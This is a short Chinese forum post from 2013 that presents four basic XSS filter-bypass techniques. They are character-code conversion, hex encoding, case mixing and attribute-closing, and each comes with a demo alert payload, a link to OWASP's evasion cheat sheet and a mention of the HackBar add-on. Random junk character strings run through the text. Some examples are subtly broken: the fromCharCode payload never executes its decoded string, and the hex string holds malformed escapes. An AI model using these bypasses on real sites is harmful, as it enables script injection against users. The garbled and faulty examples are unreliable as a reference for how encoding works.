四种超级基础的绕过方法。+ F, H6 v+ G- P' w4 s1 C0 F$ ^
1.转换为ASCII码: F, x3 r: m' F* _
例子:原脚本为<script>alert(‘I love F4ck’)</script >* j; w" q. z: p# j" r0 x
通过转换,变成:
: P0 y7 b7 \! R' N) [; E+ `<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>0 j- G0 k5 }( X4 ?+ Y: Q* t [
7 N# P7 E) h- `$ f
2.转换为HEX(十六进制)
2 s5 T' Q( c6 G6 Z5 V- X' l$ a例子:原脚本为<script>alert(‘I love F4ck’)</script>' X# O1 k& t; j- Y
通过转换,变成:, X5 H& u) N+ K, o& l* P
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e% e$ a" N* Z. L$ g# d+ l. E& s
% @4 {: K- B. U* B( I, M0 L9 E3.转换脚本的大小写
( U U0 @& S- w例子:原脚本为<script>alert(‘I love F4ck’)</script>* a3 Y7 i0 I! @. w
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>' Z! a7 z% C) v# u/ F% \
: e% @+ y& @- [; a
4.增加闭合标记”>
1 H7 u L) N6 W例子:原脚本为<script>alert(‘I love F4ck’)</script>- C3 f X0 D4 n9 @
转换为:”><script>alert(‘I love F4ck’)</script>
( P, e( r! h, w: t( W更详细绕过技术请参考此网页
/ |$ I' s& [2 j3 \' b' y2 r/ O. Nhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
8 Y# {0 [& p _# v. j
: g L! K* [: O, r转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对